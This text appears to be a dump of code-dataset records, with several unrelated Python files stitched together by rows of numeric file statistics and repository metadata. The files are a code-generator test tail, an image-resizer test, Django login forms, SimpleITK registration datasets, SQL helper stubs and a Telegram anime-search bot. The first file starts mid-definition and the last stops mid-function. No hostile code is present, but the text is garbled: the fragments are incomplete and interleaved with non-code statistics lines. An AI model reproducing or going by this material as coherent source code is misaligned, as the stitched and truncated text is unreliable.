__root__: List[User]
class Id(BaseModel):
__root__: str
class Rules(BaseModel):
__root__: List[str]
class Error(BaseModel):
code: int
message: str
class api(BaseModel):
apiKey: Optional[str] = Field(
None, description='To be used as a dataset parameter value'
)
apiVersionNumber: Optional[str] = Field(
None, description='To be used as a version parameter value'
)
apiUrl: Optional[AnyUrl] = Field(
None, description="The URL describing the dataset\'s fields"
)
apiDocumentationUrl: Optional[AnyUrl] = Field(
None, description='A URL to the API console for each API'
)
class apis(BaseModel):
__root__: List[api]
class Event(BaseModel):
name: Optional[str] = None
class Result(BaseModel):
event: Optional[Event] = None
'''
)
with pytest.raises(SystemExit):
main()
@freeze_time('2019-07-26')
def test_validation_failed():
with TemporaryDirectory() as output_dir:
output_file: Path = Path(output_dir) / 'output.py'
assert (
main(
[
'--input',
str(OPEN_API_DATA_PATH / 'invalid.yaml'),
'--output',
str(output_file),
'--input-file-type',
'openapi',
'--validation',
]
)
== Exit.ERROR
)
| 21.647153 | 85 | 0.605134 | 3,090 | 26,994 | 5.101295 | 0.070874 | 0.013703 | 0.043139 | 0.029182 | 0.855992 | 0.815898 | 0.798896 | 0.785447 | 0.759754 | 0.744338 | 0 | 0.026468 | 0.283396 | 26,994 | 1,246 | 86 | 21.664526 | 0.78841 | 0.009335 | 0 | 0.678133 | 0 | 0.001229 | 0.568356 | 0.035028 | 0 | 0 | 0 | 0 | 0.039312 | 1 | 0.022113 | false | 0.001229 | 0.085995 | 0 | 0.108108 | 0.001229 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07679a9453ffba3ea1c9da67dee4bd1de0f5fea7 | 1,791 | py | Python | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | crafters/image/ImageResizer/tests/test_imageresizer.py | julianpetrich/jina-hub | a7703282462ae3bac226249365426b3998949f8f | [
"Apache-2.0"
] | null | null | null | import pytest
import numpy as np
from .. import ImageResizer
def create_random_img_array(img_height, img_width):
    # Synthesize a random 8-bit RGB image array.
    return np.random.randint(0, 256, (img_height, img_width, 3))
def create_random_gray_img_array(img_height, img_width):
    # Synthesize a random single-channel grayscale image array.
    return np.random.randint(0, 256, (img_height, img_width, 1))
def create_random_gray_img_array_2d(img_height, img_width):
    # Synthesize a random 2D grayscale array with no channel axis.
    return np.random.randint(0, 256, (img_height, img_width))
def test_resize():
img_width = 20
img_height = 17
# Test for int target_size
output_dim = 71
crafter = ImageResizer(target_size=output_dim)
img_array = create_random_img_array(img_height, img_width)
crafted_doc = crafter.craft(img_array)
assert min(crafted_doc['blob'].shape[:-1]) == output_dim
# Test for tuple/list target_size
output_dim = (img_height, img_width)
crafter = ImageResizer(target_size=output_dim)
img_array = create_random_img_array(img_width, img_height)
crafted_doc = crafter.craft(img_array)
assert crafted_doc['blob'].shape[:-1] == output_dim
@pytest.mark.parametrize('img_array', [create_random_gray_img_array(17, 20),
create_random_gray_img_array_2d(17, 20)]
)
def test_resize_gray(img_array):
img_width = 20
img_height = 17
# Test for int target_size
output_dim = 71
crafter = ImageResizer(target_size=output_dim)
crafted_doc = crafter.craft(img_array)
assert min(crafted_doc['blob'].shape[:-1]) == output_dim
# Test for tuple/list target_size
output_dim = (img_height, img_width)
crafter = ImageResizer(target_size=output_dim)
crafted_doc = crafter.craft(img_array)
assert crafted_doc['blob'].shape == output_dim
| 31.421053 | 79 | 0.707426 | 261 | 1,791 | 4.509579 | 0.172414 | 0.101954 | 0.091759 | 0.129992 | 0.883602 | 0.863212 | 0.80034 | 0.791844 | 0.769754 | 0.769754 | 0 | 0.02714 | 0.197655 | 1,791 | 56 | 80 | 31.982143 | 0.791928 | 0.063093 | 0 | 0.552632 | 0 | 0 | 0.014943 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.131579 | false | 0 | 0.131579 | 0 | 0.342105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4ad8d6af7aa38acd4aff9c545aabcf63f8fc00be | 43 | py | Python | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | epymetheus/wealth/__init__.py | shishaboy/epymetheus | d8916b20c6b79e86e5aadb39c7c01a582659f03b | [
"BSD-3-Clause"
] | null | null | null | # flake8: noqa
from .wealth import Wealth
| 10.75 | 26 | 0.744186 | 6 | 43 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.186047 | 43 | 3 | 27 | 14.333333 | 0.885714 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4ae4613e91a88090eb9cd03e1eead6b4e657be24 | 177 | py | Python | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/views.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | 1 | 2020-03-23T13:59:40.000Z | 2020-03-23T13:59:40.000Z | # -*- coding: utf-8 -*-
# (c) 2013 Bright Interactive Limited. All rights reserved.
# http://www.bright-interactive.com | info@bright-interactive.com
# Create your views here.
| 29.5 | 65 | 0.711864 | 24 | 177 | 5.25 | 0.791667 | 0.404762 | 0.31746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03268 | 0.135593 | 177 | 5 | 66 | 35.4 | 0.79085 | 0.943503 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4af3437c3655a64888cc4528534df3607b1241a6 | 30 | py | Python | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | 3 | 2019-11-28T11:42:45.000Z | 2021-01-28T03:39:12.000Z | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | null | null | null | orkan/__init__.py | tobigue/Orkan | ff97cdb3568df3d50c3c76453ced7559d80fab2c | [
"Apache-2.0"
] | 4 | 2017-05-21T17:34:13.000Z | 2019-11-28T11:31:40.000Z | from .pipeline import Pipeline  # explicit relative import; the implicit form breaks on Python 3
| 15 | 29 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab2e19623a202a7821f9e31a4f14a7fbcd1b0b60 | 564 | py | Python | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | black_jack_project/black_jack/forms.py | cbbowman/black_jack | 6f1df1da79f17e691c022b4bc082f2377b27ccd9 | [
"CC0-1.0"
] | null | null | null | from django import forms
class RegisterForm(forms.Form):
username = forms.CharField(max_length=20)
first_name = forms.CharField(max_length=20)
last_name = forms.CharField(max_length=20)
    email = forms.CharField(max_length=30, widget=forms.EmailInput)
    password = forms.CharField(max_length=20, widget=forms.PasswordInput)
    confirm = forms.CharField(max_length=20, widget=forms.PasswordInput)
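    # NOTE: 'confirm' is only collected here; the form defines no clean()
    # override, so matching it against 'password' presumably happens in the view.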
class LoginForm(forms.Form):
username = forms.CharField(max_length=20)
    password = forms.CharField(max_length=20, widget=forms.PasswordInput) | 40.285714 | 73 | 0.769504 | 74 | 564 | 5.72973 | 0.310811 | 0.264151 | 0.320755 | 0.433962 | 0.71934 | 0.71934 | 0.582547 | 0.582547 | 0.268868 | 0 | 0 | 0.032389 | 0.124113 | 564 | 14 | 74 | 40.285714 | 0.825911 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.272727 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
ab3ffd703dc15a6d07f9e001d62263d38bdf5269 | 96 | py | Python | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 5 | 2020-08-26T20:12:00.000Z | 2020-12-11T16:39:22.000Z | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 234 | 2019-12-14T03:45:19.000Z | 2020-08-26T18:55:19.000Z | tests/integration/mongodb/impl/__init__.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 2 | 2019-10-23T15:21:15.000Z | 2020-05-22T09:35:55.000Z | from .base_col import * # noqa
from .base_result import * # noqa
from .mixin import * # noqa
| 24 | 34 | 0.6875 | 14 | 96 | 4.571429 | 0.5 | 0.46875 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 96 | 3 | 35 | 32 | 0.853333 | 0.145833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ab5d6b636527662d8e85f02e9815e689ad9c70ea | 8,861 | py | Python | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | pymira/img/datasets.py | haehn/istn | 4ad0e9a4224cc028ac0465afd4ff9712f0834f9f | [
"Apache-2.0"
] | null | null | null | import torch
import numpy as np
import pandas as pd
import SimpleITK as sitk
from torch.utils.data import Dataset, DataLoader
class ImageRegistrationDataset(Dataset):
"""Dataset for pairwise image registration."""
def __init__(self, csv_file_img, csv_file_msk=None, normalizer=None, resampler=None):
"""
Args:
:param csv_file_img (string): Path to csv file with image filenames.
:param csv_file_msk (string): Path to csv file with mask filenames.
:param normalizer (callable, optional): Optional transform to be applied on each image.
:param resampler (callable, optional): Optional transform to be applied on each image.
"""
self.data = pd.read_csv(csv_file_img)
if csv_file_msk:
self.msk_data = pd.read_csv(csv_file_msk)
self.samples = []
for idx in range(len(self.data)):
src_path = self.data.iloc[idx, 0]
trg_path = self.data.iloc[idx, 1]
print('Reading source image ' + src_path)
source = sitk.ReadImage(src_path, sitk.sitkFloat32)
print('Reading target image ' + trg_path)
target = sitk.ReadImage(trg_path, sitk.sitkFloat32)
source_msk = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_msk = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_msk:
src_msk_path = self.msk_data.iloc[idx, 0]
trg_msk_path = self.msk_data.iloc[idx, 1]
print('Reading source mask ' + src_msk_path)
source_msk = sitk.ReadImage(src_msk_path, sitk.sitkFloat32)
source_msk.CopyInformation(source)
print('Reading target mask ' + trg_msk_path)
target_msk = sitk.ReadImage(trg_msk_path, sitk.sitkFloat32)
target_msk.CopyInformation(target)
if normalizer:
source = normalizer(source, source_msk)
target = normalizer(target, target_msk)
if resampler:
source = resampler(source)
target = resampler(target)
source_msk = resampler(source_msk)
target_msk = resampler(target_msk)
if len(source.GetSize()) == 3:
source.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
target.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
else:
source.SetDirection((1, 0, 0, 1))
target.SetDirection((1, 0, 0, 1))
source.SetOrigin(np.zeros(len(source.GetOrigin())))
target.SetOrigin(np.zeros(len(target.GetOrigin())))
source_msk.CopyInformation(source)
target_msk.CopyInformation(target)
sample = {'source': source, 'target': target, 'source_msk': source_msk, 'target_msk': target_msk}
self.samples.append(sample)
def __len__(self):
return len(self.data)
def __getitem__(self, item):
sample = self.samples[item]
source = torch.from_numpy(sitk.GetArrayFromImage(sample['source'])).unsqueeze(0)
target = torch.from_numpy(sitk.GetArrayFromImage(sample['target'])).unsqueeze(0)
source_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['source_msk'])).unsqueeze(0)
target_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['target_msk'])).unsqueeze(0)
return {'source': source, 'target': target, 'source_msk': source_msk, 'target_msk': target_msk}
def get_sample(self, item):
return self.samples[item]
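# Minimal usage sketch (the csv path and transforms here are assumed, not part
# of this module):
#   dataset = ImageRegistrationDataset('pairs.csv')
#   loader = DataLoader(dataset, batch_size=1, shuffle=True)
#   for batch in loader:
#       source, target = batch['source'], batch['target']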
class ImageSegRegDataset(Dataset):
"""Dataset for pairwise image registration with segmentation loss."""
def __init__(self, csv_file_img, csv_file_seg, csv_file_msk=None, normalizer_img=None, resampler_img=None, normalizer_seg=None, resampler_seg=None):
"""
Args:
:param csv_file_img (string): Path to csv file with image filenames.
:param csv_file_seg (string): Path to csv file with segmentation filenames.
:param csv_file_msk (string): Path to csv file with mask filenames.
:param normalizer_img (callable, optional): Optional transform to be applied on each image.
:param resampler_img (callable, optional): Optional transform to be applied on each image.
:param normalizer_seg (callable, optional): Optional transform to be applied on each segmentation.
:param resampler_seg (callable, optional): Optional transform to be applied on each segmentation.
"""
self.img_data = pd.read_csv(csv_file_img)
if csv_file_seg:
self.seg_data = pd.read_csv(csv_file_seg)
if csv_file_msk:
self.msk_data = pd.read_csv(csv_file_msk)
self.samples = []
for idx in range(len(self.img_data)):
src_path = self.img_data.iloc[idx, 0]
trg_path = self.img_data.iloc[idx, 1]
print('Reading source image ' + src_path)
source = sitk.ReadImage(src_path, sitk.sitkFloat32)
print('Reading target image ' + trg_path)
target = sitk.ReadImage(trg_path, sitk.sitkFloat32)
source_seg = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_seg = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_seg:
src_seg_path = self.seg_data.iloc[idx, 0]
trg_seg_path = self.seg_data.iloc[idx, 1]
print('Reading source segmentation ' + src_seg_path)
source_seg = sitk.ReadImage(src_seg_path, sitk.sitkFloat32)
print('Reading target segmentation ' + trg_seg_path)
target_seg = sitk.ReadImage(trg_seg_path, sitk.sitkFloat32)
source_msk = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_msk = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_msk:
src_msk_path = self.msk_data.iloc[idx, 0]
trg_msk_path = self.msk_data.iloc[idx, 1]
print('Reading source mask ' + src_msk_path)
source_msk = sitk.ReadImage(src_msk_path, sitk.sitkFloat32)
source_msk.CopyInformation(source)
print('Reading target mask ' + trg_msk_path)
target_msk = sitk.ReadImage(trg_msk_path, sitk.sitkFloat32)
target_msk.CopyInformation(target)
if normalizer_img:
source = normalizer_img(source, source_msk)
target = normalizer_img(target, target_msk)
if resampler_img:
source = resampler_img(source)
target = resampler_img(target)
source_msk = resampler_img(source_msk)
target_msk = resampler_img(target_msk)
if normalizer_seg:
source_seg = normalizer_seg(source_seg)
target_seg = normalizer_seg(target_seg)
if resampler_seg:
source_seg = resampler_seg(source_seg)
target_seg = resampler_seg(target_seg)
if len(source.GetSize()) == 3:
source.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
target.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
else:
source.SetDirection((1, 0, 0, 1))
target.SetDirection((1, 0, 0, 1))
source.SetOrigin(np.zeros(len(source.GetOrigin())))
target.SetOrigin(np.zeros(len(target.GetOrigin())))
source_seg.CopyInformation(source)
target_seg.CopyInformation(target)
source_msk.CopyInformation(source)
target_msk.CopyInformation(target)
sample = {'source': source, 'target': target, 'source_seg': source_seg, 'target_seg': target_seg, 'source_msk': source_msk, 'target_msk': target_msk}
self.samples.append(sample)
def __len__(self):
return len(self.img_data)
def __getitem__(self, item):
sample = self.samples[item]
source = torch.from_numpy(sitk.GetArrayFromImage(sample['source'])).unsqueeze(0)
target = torch.from_numpy(sitk.GetArrayFromImage(sample['target'])).unsqueeze(0)
source_seg = torch.from_numpy(sitk.GetArrayFromImage(sample['source_seg'])).unsqueeze(0)
target_seg = torch.from_numpy(sitk.GetArrayFromImage(sample['target_seg'])).unsqueeze(0)
source_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['source_msk'])).unsqueeze(0)
target_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['target_msk'])).unsqueeze(0)
return {'source': source, 'target': target, 'source_seg': source_seg, 'target_seg': target_seg, 'source_msk': source_msk, 'target_msk': target_msk}
def get_sample(self, item):
return self.samples[item]
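# Each item from either dataset is a dict of tensors shaped (1, D, H, W) for
# 3D inputs (or (1, H, W) for 2D), keyed 'source'/'target' plus the matching
# '_seg' and '_msk' entries where applicable.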
| 42.806763 | 161 | 0.62476 | 1,073 | 8,861 | 4.931034 | 0.079217 | 0.034398 | 0.006804 | 0.03402 | 0.846532 | 0.795691 | 0.762049 | 0.721414 | 0.701947 | 0.701947 | 0 | 0.015432 | 0.268706 | 8,861 | 206 | 162 | 43.014563 | 0.80108 | 0.115224 | 0 | 0.573529 | 0 | 0 | 0.061339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.036765 | 0.029412 | 0.154412 | 0.073529 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db60e95abebb8c8530c95b65723600e83bfa473b | 35 | py | Python | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | from .structure import Structure
| 11.666667 | 33 | 0.8 | 4 | 35 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 35 | 2 | 34 | 17.5 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbb0b5062b24522bf82a85cf8e1725fc59ca3967 | 46 | py | Python | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | '''
Created on 29/10/2014
@author: diogo
'''
| 7.666667 | 21 | 0.608696 | 7 | 46 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0.173913 | 46 | 5 | 22 | 9.2 | 0.526316 | 0.804348 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbb75bb928b018730096d1a2c5506e8db69f0363 | 48 | py | Python | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | 3 | 2021-07-26T02:07:15.000Z | 2021-12-21T22:36:15.000Z | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | null | null | null | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | null | null | null | from .forward_inference import ForwardInference
| 24 | 47 | 0.895833 | 5 | 48 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 48 | 1 | 48 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbbe4f558307c3529174b3aea19ab2b61367f3e9 | 1,365 | py | Python | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | 2 | 2021-11-12T10:25:02.000Z | 2022-03-30T06:33:52.000Z | def _carve(string):
return str(string).title()
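# Apart from _carve and _split above, the helpers below are passthrough stubs:
# they echo their arguments unchanged, presumably only registering the SQL
# function names (math, regex, base64 and network helpers) with the query layer.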
def _split(string, delimiter, index):
    sub_strings = string.split(delimiter)
    return sub_strings[index]
def _concat(*args):
return args
def _concat_ws(*args):
return args
def _regex_split(column, pattern, index):
return column, pattern, index
def _regex_match(column, pattern, index):
return column, pattern, index
def _inet_aton(string):
return string
def _community_id_v1(source_addr, dest_addr, source_port, dest_port, protocol):
return source_addr, dest_addr, source_port, dest_port, protocol
def _to_base64(string):
return string
def _from_base64(string):
return string
def _conditional_to_base64(string):
return string
def _sqrt(string):
return string
def _log(string):
return string
def _log10(string):
return string
def _ceil(string):
return string
def _floor(string):
return string
def _power(string):
return string
def _pi(string):
return string
def _sin(string):
return string
def _cos(string):
return string
def _tan(string):
return string
def _asin(string):
return string
def _acos(string):
return string
def _cot(string):
return string
def _atan(string):
return string
def _radians(string):
return string
def _degrees(string):
return string | 12.757009 | 79 | 0.704029 | 180 | 1,365 | 5.077778 | 0.266667 | 0.275711 | 0.393873 | 0.436543 | 0.287746 | 0.258206 | 0.194748 | 0.194748 | 0.09628 | 0 | 0 | 0.008388 | 0.213919 | 1,365 | 107 | 80 | 12.757009 | 0.84343 | 0 | 0 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.490909 | false | 0 | 0 | 0.472727 | 0.981818 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dbc5b24e3cfd63bf03f311149af00b937c59b731 | 3,160 | py | Python | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | 8 | 2021-01-23T13:58:36.000Z | 2021-12-27T07:46:47.000Z | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | null | null | null | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | 7 | 2021-02-15T08:26:15.000Z | 2022-01-29T05:57:54.000Z | from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from bot import EMILIA, jikan
from .mal import data_from_id
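# The three handlers below share one pattern: search Jikan (the MyAnimeList
# API wrapper), offer up to five matches as inline buttons whose callback data
# ("anime <id>", "manga <id>", "char <id>") is presumably resolved elsewhere
# via data_from_id, and reply with the inline keyboard.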
@EMILIA.on_message(filters.command(["anime"], prefixes="/") & ~filters.edited)
async def get_anime(client, message):
    query = message.text.split(maxsplit=1)
    if len(query) < 2:
        await EMILIA.send_message(chat_id=message.chat.id, text="No search query found!\nExample:\n**/anime <anime_name>**", parse_mode="markdown")
        return
    try:
        temp = jikan.search("anime", query[-1])
        buttons = []
        for i in range(5):
            try:
                temp_btn = [InlineKeyboardButton(temp["results"][i]["title"], f"anime {temp['results'][i]['mal_id']}")]
                buttons.append(temp_btn)
            except IndexError:  # fewer than five search results
                break
        text = f"Search results for **{query[-1]}**:"
        await EMILIA.send_message(chat_id=message.chat.id, text=text, reply_markup=InlineKeyboardMarkup(buttons))
    except Exception as e:
        await EMILIA.send_message(chat_id=message.chat.id, text=f"**Error:**\n{e}")
@EMILIA.on_message(filters.command(["manga"], prefixes="/") & ~filters.edited)
async def get_manga(client, message):
    query = message.text.split(maxsplit=1)
    if len(query) < 2:
        await EMILIA.send_message(chat_id=message.chat.id, text="No search query found!\nExample:\n**/manga <manga_name>**", parse_mode="markdown")
        return
    try:
        temp = jikan.search("manga", query[-1])
        buttons = []
        for i in range(5):
            try:
                temp_btn = [InlineKeyboardButton(temp["results"][i]["title"], f"manga {temp['results'][i]['mal_id']}")]
                buttons.append(temp_btn)
            except IndexError:  # fewer than five search results
                break
        text = f"Search results for **{query[-1]}**:"
        await EMILIA.send_message(chat_id=message.chat.id, text=text, reply_markup=InlineKeyboardMarkup(buttons))
    except Exception as e:
        await EMILIA.send_message(chat_id=message.chat.id, text=f"**Error:**\n{e}")
@EMILIA.on_message(filters.command(["character"], prefixes="/") & ~filters.edited)
async def get_character(client, message):
    query = message.text.split(maxsplit=1)
    if len(query) < 2:
        await EMILIA.send_message(chat_id=message.chat.id, text="No search query found!\nExample:\n**/character <character_name>**", parse_mode="markdown")
        return
    try:
